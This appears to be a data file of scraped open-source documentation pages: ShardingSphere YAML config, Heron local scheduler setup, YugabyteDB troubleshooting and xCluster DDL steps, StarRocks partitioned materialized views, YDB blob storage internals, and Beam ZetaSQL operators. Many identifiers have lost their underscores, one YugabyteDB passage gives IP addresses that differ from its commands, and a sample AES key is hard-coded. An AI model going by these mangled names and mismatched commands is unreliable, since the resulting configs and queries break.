shardingAlgorithmName: torderinline keyGenerateStrategy: column: order_id keyGeneratorName: snowflake defaultDatabaseStrategy: standard: shardingColumn: user_id shardingAlgorithmName: database_inline shardingAlgorithms: database_inline: type: INLINE props: algorithm-expression: replicads${user_id % 2} torderinline: type: INLINE props: algorithm-expression: torder${order_id % 2} torderitem_inline: type: INLINE props: algorithm-expression: torderitem${orderid % 2} keyGenerators: snowflake: type: SNOWFLAKE !ENCRYPT encryptors: aes_encryptor: type: AES props: aes-key-value: 123456abc assisted_encryptor: type: MD5 like_encryptor: type: CHARDIGESTLIKE tables: t_encrypt: columns: user_id: cipher: name: user_cipher encryptorName: aes_encryptor assistedQuery: name: assistedqueryuser encryptorName: assisted_encryptor likeQuery: name: likequeryuser encryptorName: like_encryptor order_id: cipher: name: order_cipher encryptorName: aes_encryptor ```" } ]
{ "category": "App Definition and Development", "file_name": "schedulers-local.md", "project_name": "Apache Heron", "subcategory": "Streaming & Messaging" }
[ { "data": "id: version-0.20.0-incubating-schedulers-local title: Local Cluster sidebar_label: Local Cluster original_id: schedulers-local <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> In addition to out-of-the-box schedulers for , Heron can also be deployed in a local environment, which stands up a mock Heron cluster on a single machine. This can be useful for experimenting with Heron's features, testing a wide variety of possible cluster events, and so on. One of two state managers can be used for coordination when deploying locally: Note: Deploying a Heron cluster locally is not to be confused with Heron's . Simulator mode enables you to run topologies in a cluster-agnostic JVM process for the purpose of development and debugging, while the local scheduler stands up a Heron cluster on a single machine. Using the local scheduler is similar to deploying Heron on other schedulers. The cli is used to deploy and manage topologies as would be done using a distributed scheduler. The main difference is in the configuration. To configure Heron to use local scheduler, specify the following in `scheduler.yaml` config file. `heron.class.scheduler` Indicates the class to be loaded for local scheduler. Set this to `org.apache.heron.scheduler.local.LocalScheduler` `heron.class.launcher` Specifies the class to be loaded for launching topologies. Set this to `org.apache.heron.scheduler.local.LocalLauncher` `heron.scheduler.local.working.directory` Provides the working directory for topology. The working directory is essentially a scratch pad where topology jars, heron core release binaries, topology logs, etc are generated and kept. `heron.package.core.uri` Indicates the location of the heron core binary package. The local scheduler uses this URI to download the core package to the working directory. `heron.directory.sandbox.java.home` Specifies the java home to be used when running topologies in the containers. Set to `${JAVA_HOME}` to use the value set in the bash environment variable $JAVA_HOME. ```yaml heron.class.scheduler: org.apache.heron.scheduler.local.LocalScheduler heron.class.launcher: org.apache.heron.scheduler.local.LocalLauncher heron.scheduler.local.working.directory: ${HOME}/.herondata/topologies/${CLUSTER}/${TOPOLOGY} heron.package.core.uri: file://${HERON_DIST}/heron-core.tar.gz heron.directory.sandbox.java.home: ${JAVA_HOME} ```" } ]
{ "category": "App Definition and Development", "file_name": "vm.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Install and upgrade issues on virtual machines headerTitle: Install and upgrade issues on virtual machines linkTitle: Install and upgrade issues description: Troubleshoot issues encountered when installing or upgrading YugabyteDB Anywhere on virtual machines. menu: v2.18_yugabyte-platform: identifier: install-upgrade-vm-issues parent: troubleshoot-yp weight: 10 type: docs <ul class=\"nav nav-tabs-alt nav-tabs-yb\"> <li> <a href=\"../vm/\" class=\"nav-link active\"> <i class=\"fa-solid fa-building\"></i> Virtual machine</a> </li> <li> <a href=\"../kubernetes/\" class=\"nav-link\"> <i class=\"fa-regular fa-dharmachakra\" aria-hidden=\"true\"></i> Kubernetes </a> </li> </ul> Occasionally, you might encounter issues during installation and upgrade of YugabyteDB Anywhere on a virtual machine. Most of these issues are related to connections. If you experience difficulties while troubleshooting, contact . If your YugabyteDB Anywhere host has a firewall managed by firewalld enabled, then Docker Engine might not be able to connect to the host. To resolve the issue, you can open the ports using firewall exceptions by using the following commands: ```sh sudo firewall-cmd --zone=trusted --add-interface=docker0 sudo firewall-cmd --zone=public --add-port=80/tcp sudo firewall-cmd --zone=public --add-port=443/tcp sudo firewall-cmd --zone=public --add-port=8800/tcp sudo firewall-cmd --zone=public --add-port=5432/tcp sudo firewall-cmd --zone=public --add-port=9000/tcp sudo firewall-cmd --zone=public --add-port=9090/tcp sudo firewall-cmd --zone=public --add-port=32769/tcp sudo firewall-cmd --zone=public --add-port=32770/tcp sudo firewall-cmd --zone=public --add-port=9880/tcp sudo firewall-cmd --zone=public --add-port=9874-9879/tcp ``` The node access might not be available due to IP addresses that cannot be resolved. To remedy the situation, you can create mount paths on the nodes with private IP addresses `10.1.13.150`, `10.1.13.151`, and `10.1.13.152` by executing the following command: ```sh for IP in 10.1.12.103 10.1.12.104 10.1.12.105; do ssh $IP mkdir -p /mnt/data0; done ``` If a firewall is enabled for nodes, it might interfere with node connections. To resolve the issue, you can add firewall exceptions on the nodes with private IP addresses `10.1.13.150`, `10.1.13.151`, and `10.1.13.152` by executing the following command: ```sh for IP in 10.1.12.103 10.1.12.104 10.1.12.105; do ssh $IP firewall-cmd --zone=public --add-port=7000/tcp; ssh $IP firewall-cmd --zone=public --add-port=7100/tcp; ssh $IP firewall-cmd --zone=public --add-port=9000/tcp; ssh $IP firewall-cmd --zone=public --add-port=9100/tcp; ssh $IP firewall-cmd --zone=public --add-port=11000/tcp; ssh $IP firewall-cmd --zone=public --add-port=12000/tcp; ssh $IP firewall-cmd --zone=public --add-port=9300/tcp; ssh $IP firewall-cmd --zone=public --add-port=9042/tcp; ssh $IP firewall-cmd --zone=public --add-port=6379/tcp; done ``` <!-- For YugabyteDB Anywhere HTTPS configuration, you should set your own key or certificate. If you do provide this setting, the default public key is used, creating a potential security risk. -->" } ]
{ "category": "App Definition and Development", "file_name": "async-transactional-tables.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Handling DDLs in transactional xCluster headerTitle: Handling DDLs linkTitle: Handling DDLs description: How to handle DDLs when using transactional xCluster replication between universes headContent: Handling DDLs in transactional xCluster menu: stable: parent: async-replication-transactional identifier: async-transactional-tables weight: 50 type: docs When DDL operations are performed to databases in transactional xCluster replication (such as creating, altering, or dropping tables or partitions), the statements must be executed on both the Primary/Source and Standby/Target and the xCluster configuration must be updated. You should perform these actions in a specific order, depending on the type of DDL, as indicated in the table below. | DDL | Step 1 | Step 2 | Step 3 | | : | : | : | : | | CREATE TABLE | Execute DDL on Primary | Execute DDL on Standby | Add the table to replication | | CREATE TABLE foo PARTITION OF bar | Execute DDL on Primary | Execute DDL on Standby | Add the table to replication | | DROP TABLE | Remove the table from replication | Execute DDL on Standby | Execute DDL on Primary | | CREATE INDEX | Execute DDL on Primary | Execute DDL on Standby | - | | DROP INDEX | Execute DDL on Standby | Execute DDL on Primary | - | | ALTER TABLE or INDEX | Execute DDL on Standby | Execute DDL on Primary | - | To ensure that data is protected at all times, set up replication on a new table before inserting any into it. If a table already has data before adding it to replication, then adding the table to replication can result in a backup and restore of the entire database. Add tables to replication in the following sequence: Create the table on the Primary. Create the table on the Standby. Add the table to the replication. For instructions on adding tables to replication, refer to . Remove tables from replication in the following sequence: Remove the table from replication. For instructions on removing tables from replication, refer to" }, { "data": "Drop the table from both Primary and Standby databases separately. Indexes are automatically added to replication in an atomic fashion after you create the indexes separately on Primary and Standby. You do not have to stop the writes on the Primary. Note: The Create Index DDL may kill some in-flight transactions. This is a temporary error. Retry any failed transactions. Add indexes to replication in the following sequence: Create an index on the Primary. Wait for index backfill to finish. Create the same index on Standby. Wait for index backfill to finish. For instructions on monitoring backfill, refer to . When an index is dropped it is automatically removed from replication. Remove indexes from replication in the following sequence: Drop the index on the Standby universe. Drop the index on the Primary universe. Adding a table partition is similar to adding a table. The caveat is that the parent table (if not already) along with each new partition has to be added to the replication, as DDL changes are not replicated automatically. Each partition is treated as a separate table and is added to replication separately (like a table). 
For example, you can create a table with partitions as follows: ```sql CREATE TABLE order_changes ( order_id int, change_date date, type text, description text) PARTITION BY RANGE (change_date); ``` ```sql CREATE TABLE orderchangesdefault PARTITION OF order_changes DEFAULT; ``` Create a new partition: ```sql CREATE TABLE orderchanges202301 PARTITION OF orderchanges FOR VALUES FROM ('2023-01-01') TO ('2023-03-30'); ``` Assume the parent table and default partition are included in the replication stream. To add a table partition to the replication, follow the same steps for . To remove a table partition from replication, follow the same steps as . You can alter the schema of tables and indexes without having to stop writes on the Primary. Note: The ALTER DDL may kill some in-flight transactions. This is a temporary error. Retry any failed transactions. Alter the schema of tables and indexes in the following sequence: Alter the index on the Standby universe. Alter the index on the Primary universe." } ]
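As an illustration of the index and ALTER workflows described above, using the `order_changes` table from the earlier example (the index name and added column are arbitrary placeholders):

```sql
-- Indexes: run on the Primary universe first; wait for index backfill to finish.
CREATE INDEX idx_order_changes_type ON order_changes (type);

-- Then run the identical statement on the Standby universe and wait for backfill again.
CREATE INDEX idx_order_changes_type ON order_changes (type);

-- ALTER runs in the opposite order: first on the Standby, then on the Primary.
ALTER TABLE order_changes ADD COLUMN region text;
```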
{ "category": "App Definition and Development", "file_name": "ineat.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Ineat\" icon: /images/logos/powered-by/ineat.png hasLink: \"https://ineat.fr/\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "create_partitioned_materialized_view.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" This topic introduces how to create a partitioned materialized view to accommodate different use cases. StarRocks' asynchronous materialized views support a variety of partitioning strategies and functions that allow you to achieve the following effects: Incremental construction When creating a partitioned materialized view, you can set the creation task to refresh partitions in batches to avoid excessive resource consumption. Incremental refresh You can set the refresh task to update only the corresponding partitions of the materialized view when it detects data changes in certain partitions of the base table. Partition-level refresh can significantly prevent the waste of resources used to refresh the entire materialized view. Partial materialization You can set TTL for materialized view partitions, allowing for partial materialization of the data. Transparent query rewrite Queries can be rewritten transparently based on only those updated materialized view partitions. Partitions that are deemed outdated will not be involved in the query plan, and the query will be executed on the base tables to guarantee the consistency of data. A partitioned materialized view can be created only on a partitioned base table (usually a fact table). Only by mapping the partition relationship between the base table and the materialized view can you build the synergy between them. Currently, StarRocks supports building partitioned materialized views on tables from the following data sources: StarRocks OLAP tables in the default catalog Supported partitioning strategy: Range partitioning Supported data types for Partitioning Key: INT, DATE, DATETIME, and STRING Supported table types: Primary Key, Duplicate Key, Aggregate Key, and Unique Key Supported both in shared-nothing cluster and shared-data cluster Tables in Hive Catalog, Hudi Catalog, Iceberg Catalog, and Paimon Catalog Supported partitioning level: Primary level Supported data types for Partitioning Key: INT, DATE, DATETIME, and STRING :::note You cannot create a partitioned materialized view based on a non-partitioned base (fact) table. For StarRocks OLAP tables: Currently, list partitioning and expression partitioning are not supported. The two adjacent partitions of the base table must have consecutive ranges. For multi-level partitioned base tables in external catalogs, only the primary level partitioning path can be used to create a partitioned materialized view. For example, for a table partitioned in the `yyyyMMdd/hour` format, you can only build the materialized view partitioned by `yyyyMMdd`. From v3.2.3, StarRocks supports creating partitioned materialized views upon Iceberg tables with , and the materialized views are partitioned by the column after the transformation. For more information, see . ::: Suppose there are base tables as follows: ```SQL CREATE TABLE IF NOT EXISTS par_tbl1 ( datekey DATE, -- DATE type date column used as the Partitioning Key. 
k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (datekey) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); CREATE TABLE IF NOT EXISTS par_tbl2 ( datekey STRING, -- STRING type date column used as the Partitioning" }, { "data": "k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (str2date(datekey, '%Y-%m-%d')) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); CREATE TABLE IF NOT EXISTS par_tbl3 ( datekeynew DATE, -- Equivalent column with partbl1.datekey. k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (datekey_new) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); ``` You can create a materialized view whose partitions correspond to the partitions of the base table one-to-one by using the same Partitioning Key. If the Partitioning Key of the base table is the DATE or DATETIME type, you can directly specify the same Partitioning Key for the materialized view. ```SQL PARTITION BY <basetablepartitioning_column> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv1 REFRESH ASYNC PARTITION BY datekey AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` If the Partitioning Key of the base table is the STRING type, you can use the function to convert the date string into the DATE or DATETIME type. ```SQL PARTITION BY str2date(<basetablepartitioning_column>, <format>) ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv2 REFRESH ASYNC PARTITION BY str2date(datekey, '%Y-%m-%d') AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl2 GROUP BY datekey, k1; ``` You can create a materialized view whose partitioning granularity is larger than that of the base table by using the function on the Partitioning Key. When data changes are detected in the partitions of the base table, StarRocks refreshes the corresponding rollup partitions in the materialized view. If the Partitioning Key of the base table is the DATE or DATETIME type, you can directly use the date_trunc function on the Partitioning Key of the base table. ```SQL PARTITION BY datetrunc(<format>, <basetablepartitioningcolumn>) ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv3 REFRESH ASYNC PARTITION BY date_trunc('month', datekey) AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` If the Partitioning Key of the base table is the STRING type, you must convert the Partitioning Key of the base table into the DATE or DATETIME type in the SELECT list, set an alias for it, and use it in the date_trunc function to specify the Partitioning Key of the materialized view. ```SQL PARTITION BY datetrunc(<format>, <mvpartitioning_column>) AS SELECT str2date(<basetablepartitioningcolumn>, <format>) AS <mvpartitioning_column> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv4 REFRESH ASYNC PARTITION BY datetrunc('month', mvdatekey) AS SELECT datekey, k1, sum(v1) AS SUM, str2date(datekey, '%Y-%m-%d') AS mv_datekey FROM par_tbl2 GROUP BY datekey, k1; ``` The partition rollup method mentioned above only allows partitioning the materialized view based on specific time granularities and does not permit customizing the partition time range. 
If your business scenario requires partitioning using a customized time granularity, you can create a materialized view and define the time granularity for its partitions by using the date_trunc function with the or function, which can convert a given time into the beginning or end of a time interval based on the specified time" }, { "data": "You need to define the new time granularity (interval) by using the timeslice or dateslice function on the Partitioning Key of the base table in the SELECT list, set an alias for it, and use it in the date_trunc function to specify the Partitioning Key of the materialized view. ```SQL PARTITION BY datetrunc(<format>, <mvpartitioning_column>) AS SELECT -- You can use timeslice or dateslice. dateslice(<basetablepartitioningcolumn>, <interval>) AS <mvpartitioningcolumn> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv5 REFRESH ASYNC PARTITION BY datetrunc('day', mvdatekey) AS SELECT k1, sum(v1) AS SUM, timeslice(datekey, INTERVAL 5 MINUTE) AS mvdatekey FROM par_tbl1 GROUP BY datekey, k1; ``` You can create a materialized view whose partitions are aligned with those of multiple base tables, as long as the partitions of the base tables can align with each other, that is, the base tables use the same type of Partitioning Key. You can use JOIN to connect the base tables, and set the Partition Key as the common column. Alternatively, you can connect them with UNION. The base tables with aligned partitions are called reference tables. Data changes in any of the reference tables will trigger the refresh task on the corresponding partitions of the materialized view. This feature is supported from v3.3 onwards. ```SQL -- Connect tables with JOIN. CREATE MATERIALIZED VIEW par_mv6 REFRESH ASYNC PARTITION BY datekey AS SELECT par_tbl1.datekey, par_tbl1.k1 AS t1k1, par_tbl3.k1 AS t2k1, sum(par_tbl1.v1) AS SUM1, sum(par_tbl3.v1) AS SUM2 FROM partbl1 JOIN partbl3 ON partbl1.datekey = partbl3.datekey_new GROUP BY par_tbl1.datekey, t1k1, t2k1; -- Connect tables with UNION. CREATE MATERIALIZED VIEW par_mv7 REFRESH ASYNC PARTITION BY datekey AS SELECT par_tbl1.datekey, par_tbl1.k1 AS t1k1, sum(par_tbl1.v1) AS SUM1 FROM par_tbl1 GROUP BY par_tbl1.datekey, par_tbl1.k1 UNION ALL SELECT partbl3.datekeynew, par_tbl3.k1 AS t2k1, sum(par_tbl3.v1) AS SUM2 FROM par_tbl3 GROUP BY partbl3.datekeynew, par_tbl3.k1; ``` You can create a partitioned materialized view that refreshes by partitions to achieve incremental updates of the materialized view and transparent rewrite of queries with partial data materialization. To achieve these goals, you must consider the following aspects when creating a materialized view: Refresh granularity You can use the property `partitionrefreshnumber` to specify the granularity of each refresh operation. `partitionrefreshnumber` controls the maximum number of partitions to be refreshed in a refresh task when a refresh is triggered. If the number of partitions to be refreshed exceeds this value, StarRocks will split the refresh task and complete it in batches. The partitions are refreshed in chronological order from the least recent partition to the most recent partition (excluding partitions created dynamically for the future). The default value of `partitionrefreshnumber` is `-1`, indicating the refresh task will not be split. Materialization scope The scope of the materialized data is controlled by the properties `partitionttlnumber` (for versions earlier than v3.1.5) or `partitionttl` (recommended for v3.1.5 and later). 
`partitionttlnumber` specifies the number of the most recent partitions to retain, and `partitionttl` specifies the time range of the materialized view data to retain. During each refresh, StarRocks arranges the partitions in chronological order, and retains only those who satisfy the TTL requirements. Refresh strategy Materialized views with automatic refresh strategies (`REFRESH ASYNC`) are automatically refreshed each time the base table data changes. Materialized views with regular refresh strategies (`REFRESH ASYNC [START (<start_time>)] EVERY (INTERVAL <interval>)`) are refreshed regularly at the interval" }, { "data": ":::note Materialized views with automatic refresh strategies and regular refresh strategies are refreshed automatically once the refresh tasks are triggered. StarRocks records and compares the data versions of each partition of the base table. A change in the data version indicates a data change in the partition. Once StarRocks detects a data change in the partition of the base table, it refreshes the corresponding partition of the materialized view. When no data changes are detected on the base table partition, the refresh for the corresponding materialized view partition is skipped. ::: Materialized views with manual refresh strategies (`REFRESH MANUAL`) can be refreshed only by manually executing the REFRESH MATERIALIZED VIEW statement. You can specify the time range of the partitions to be refreshed to avoid refreshing the whole materialized view. If you specify `FORCE` in the statement, StarRocks forcibly refreshes the corresponding materialized view or partitions regardless of whether the data in the base table is changed. By adding `WITH SYNC MODE` to the statement, you can make a synchronous call of the refresh task, and StarRocks returns the task result only when the task succeeds or fails. The following example creates a partitioned materialized view `parmv8`. If StarRocks detects data changes in a partition of the base table, it refreshes the corresponding partition in the materialized view. A refresh task is split into batches, each of which only refreshes one partition (`\"partitionrefreshnumber\" = \"1\"`). Only two most recent partitions are retained (`\"partitionttl_number\" = \"2\"`), the others are deleted during the refresh. ```SQL CREATE MATERIALIZED VIEW par_mv8 REFRESH ASYNC PARTITION BY datekey PROPERTIES( \"partitionttlnumber\" = \"2\", \"partitionrefreshnumber\" = \"1\" ) AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` You can use the REFRESH MATERIALIZED VIEW statement to refresh this materialized view. The following example makes a synchronous call to forcibly refresh some partitions of `par_mv8` within a certain time range. ```SQL REFRESH MATERIALIZED VIEW par_mv8 PARTITION START (\"2021-01-03\") END (\"2021-01-04\") FORCE WITH SYNC MODE; ``` Output: ```Plain +--+ | QUERY_ID | +--+ | 1d1c24b8-bf4b-11ee-a3cf-00163e0e23c9 | +--+ 1 row in set (1.12 sec) ``` With the TTL feature, only some of the partitions are retained in `par_mv8`. You have thus achieved the materialization of partial data, which is important in scenarios where most queries are against the recent data. The TTL feature allows you to transparently accelerate queries on new data (for example, within a week or month) with the materialized view while significantly saving storage costs. Queries that do not fall into this time range are routed to the base table. 
In the following example, Query 1 will be accelerated by the materialized view because it hits the partition that is retained in `par_mv8`, while Query 2 will be routed to the base table because it does not fall into the time range where the partitions are retained. ```SQL -- Query 1 SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 WHERE datekey='2021-01-04' GROUP BY datekey, k1; -- Query 2 SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 WHERE datekey='2021-01-01' GROUP BY datekey, k1; ```" } ]
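Putting the pieces above together, the following sketch (not one of the original numbered examples; the view name, property values, and identifiers follow the preceding `par_tbl1` examples and are illustrative only) builds a monthly rollup that refreshes one partition per batch and keeps only the three most recent monthly partitions:

```SQL
CREATE MATERIALIZED VIEW par_mv9
REFRESH ASYNC
PARTITION BY date_trunc('month', datekey)
PROPERTIES (
    -- Refresh at most one partition per batch.
    "partition_refresh_number" = "1",
    -- Keep only the three most recent monthly partitions.
    "partition_ttl_number" = "3"
)
AS
SELECT k1, sum(v1) AS SUM, datekey
FROM par_tbl1
GROUP BY datekey, k1;
```

As with `par_mv8`, partitions that fall outside the TTL window are dropped during refresh, so only queries against recent months are candidates for transparent rewrite.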
{ "category": "App Definition and Development", "file_name": "distributed_storage_interface.md", "project_name": "YDB", "subcategory": "Database" }
[ { "data": "Each blob has a 192-bit ID consisting of the following fields (in the order used for sorting): TabletId (64 bits): ID of the blob owner tablet. Channel (8 bits): Channel sequence number. Generation (32 bits): Generation in which the tablet that captured this blob was run. Step (32 bits): Blob group internal ID within Generation. Cookie (24 bits): ID to use if Step is insufficient. CrcMode (2 bits): Selects a mode for redundant blob integrity verification at the BlobStorage level. BlobSize (26 bits): Blob data size. PartId (4 bits): Fragment number when using blob erasure coding. At the \"BlobStorage <-> tablet\" communication level, this parameter is always 0 referring to the entire blob. Two blobs are considered different if at least one of the first five parameters (TabletId, Channel, Generation, Step, or Cookie) differs in their IDs. So it is impossible to write two blobs that only differ in BlobSize and/or CrcMode. For debugging purposes, there is string blob ID representation in `[TabletId:Generation:Step:Channel:Cookie:BlobSize:PartId]` format, for example, `[12345:1:1:0:0:1000:0]`. When writing a blob, the tablet selects the Channel, Step, and Cookie parameters. TabletId is fixed and must point to the tablet performing the write operation, while Generation must indicate the generation that the tablet performing the operation is running in. When performing reads, the blob ID is specified, which can be arbitrary, but preferably preset. Blobs are written in a logical entity called group. A special actor called DS proxy is created on every node for each group that is written to. This actor is responsible for performing all operations related to the group. The actor is created automatically through the NodeWarden service that will be described below. Physically, a group is a set of multiple physical devices (OS block devices) that are located on different nodes so that the failure of one device correlates as little as possible with the failure of another device. These devices are usually located in different racks or different datacenters. On each of these devices, some space is allocated for the group, which is managed by a special service called VDisk. Each VDisk runs on top of a block storage device from which it is separated by another service called PDisk. Blobs are broken into fragments based on with these fragments written to VDisks. Before splitting into fragments, optional encryption of the data in the group can be performed. This scheme is shown in the figure below. VDisks from different groups are shown as multicolored squares; one color stands for one" }, { "data": "A group can be treated as a set of VDisks: Each VDisk within a group has a sequence number, and disks are numbered 0 to N-1, where N is the number of disks in the group. In addition, the group disks are grouped into fail domains and fail domains into fail realms. Each fail domain usually has exactly one disk inside (although, in theory, it may have more, but this is not used in practice), while multiple fail realms are only used for groups whose data is stored in all three data centers. Thus, in addition to a group sequence number, each VDisk is assigned an ID that consists of a fail realm index, the index that a fail domain has in a fail realm, and the index that a VDisk has in the fail domain. In string form, this ID is written as `VDISK[GroupId:GroupGeneration:FailRealm:FailDomain:VDisk]`. All fail realms have the same number of fail domains, and all fail domains include the same number of disks. 
The number of the fail realms, the number of the fail domains inside the fail realm, and the number of the disks inside the fail domain make up the geometry of the group. The geometry depends on the way the data is encoded in the group. For example, for block-4-2 numFailRealms = 1, numFailDomainsInFailRealm >= 8 (only 8 fail realms are used in practice), numVDisksInFailDomain >= 1 (strictly 1 fail domain is used in practice). For mirror-3-dc numFailRealms >= 3, numFailDomainsInFailRealm >= 3, and numVDisksInFailDomain >= 1 (3x3x1 are used). Each PDisk has an ID that consists of the number of the node that it is running on and the internal number of the PDisk inside this node. This ID is usually written as NodeId:PDiskId. For example, 1:1000. If you know the PDisk ID, you can calculate the service ActorId of this disk and send it a message. Each VDisk runs on top a specific PDisk and has a slot ID comprising three fields (NodeID:PDiskId:VSlotId) as well as the above-mentioned VDisk ID. Strictly speaking, there are different concepts: a slot is a reserved location on a PDISK occupied by a VDisk while a VDisk is an element of a group that occupies a certain slot and performs operations with the slot. Similarly to PDisks, if you know the slot ID, you can calculate the service ActorId of the running VDisk and send it a message. To send messages from the DS proxy to the VDisk, an intermediate actor called BS_QUEUE is used. The composition of each group is not" }, { "data": "It may change while the system is running. Hence the concept of a group generation. Each \"GroupId:GroupGeneration\" pair corresponds to a fixed set of slots (a vector that consists of N slot IDs, where N is equal to group size) that stores the data of an entire group. Group generation is not to be confused with tablet generation since they are not in any way related. As a rule, groups of two adjacent generations differ by no more than one slot. A special concept of a subgroup is introduced for each blob. It is an ordered subset of group disks with a strictly constant number of elements that will store the blob's data and that depends on the encoding type (the number of elements in a group must be the same or greater). For single-datacenter groups with conventional encoding, this subset is selected as the first N elements of a cyclic disk permutation in the group, where the permutation depends on the BlobId hash. Each disk in the subgroup corresponds to a disk in the group, but is limited by the allowed number of stored blobs. For example, for block-4-2 encoding with four data parts and two parity parts, the functional purpose of the disks in a subgroup is as follows: | Number in the subgroup | Possible PartIds | |-|-| | 0 | 1 | | 1 | 2 | | 2 | 3 | | 3 | 4 | | 4 | 5 | | 5 | 6 | | 6 | 1,2,3,4,5,6 | | 7 | 1,2,3,4,5,6 | In this case, PartId=1..4 corresponds to data fragments (resulting from dividing the original blob into 4 equal parts), while PartId=5..6 stands for parity fragments. Disks numbered 6 and 7 in the subgroup are called handoff disks. Any part, either one or more, can be written to them. You can only write the respective blob parts to disks 0..5. In practice, when performing writes, the system tries to write 6 parts to the first 6 disks of the subgroup and, in the vast majority of cases, these attempts are successful. However, if any of the disks is not available, a write operation cannot succeed, which is when handoff disks kick in receiving the parts belonging to the disks that did not respond in time. 
Because of a combination of slowdowns and races, several fragments of the same blob may end up on the same handoff disk. This is acceptable, although it is pointless from a storage standpoint: ideally, each fragment should be stored on its own disk." } ]
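The subgroup selection described above can be illustrated with a small conceptual sketch (this is not the actual YDB code, and the hash value is arbitrary): the group's disks are rotated by an amount derived from the BlobId hash, and the first N disks of the rotated order form the subgroup, with the slot position determining which parts a disk may hold.

```python
# Conceptual sketch only (not the real YDB algorithm or hash function):
# choose a blob's subgroup as the first N disks of a cyclic permutation
# of the group, where the rotation depends on the BlobId hash.
def choose_subgroup(group_disks, blob_id_hash, subgroup_size):
    start = blob_id_hash % len(group_disks)
    rotated = group_disks[start:] + group_disks[:start]
    return rotated[:subgroup_size]

# For block-4-2 the subgroup has 8 slots: slots 0..5 may hold only their own
# part (1..6), while slots 6 and 7 are handoff slots that may hold any part.
group = [f"disk-{i}" for i in range(8)]
print(choose_subgroup(group, blob_id_hash=0x5A3C, subgroup_size=8))
```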
{ "category": "App Definition and Development", "file_name": "operators.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "type: languages title: \"Beam ZetaSQL operators\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Operators are represented by special characters or keywords; they do not use function call syntax. An operator manipulates any number of data inputs, also called operands, and returns a result. Common conventions: Unless otherwise specified, all operators return `NULL` when one of the operands is `NULL`. The following table lists all supported operators from highest to lowest precedence. Precedence determines the order in which operators will be evaluated within a statement. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Order of Precedence</th> <th>Operator</th> <th>Input Data Types</th> <th>Name</th> <th>Operator Arity</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>.</td> <td><span> STRUCT</span><br></td> <td>Member field access operator</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[ ]</td> <td>ARRAY</td> <td>Array position. Must be used with OFFSET or ORDINAL&mdash.</td> <td>Binary</td> </tr> <tr> <td>2</td> <td>-</td> <td>All numeric types</td> <td>Unary minus</td> <td>Unary</td> </tr> <tr> <td>3</td> <td>*</td> <td>All numeric types</td> <td>Multiplication</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>/</td> <td>All numeric types</td> <td>Division</td> <td>Binary</td> </tr> <tr> <td>4</td> <td>+</td> <td>All numeric types</td> <td>Addition</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>-</td> <td>All numeric types</td> <td>Subtraction</td> <td>Binary</td> </tr> <tr> <td>5 (Comparison Operators)</td> <td>=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Equal</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&lt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Less than</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&gt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Greater than</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&lt;=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete 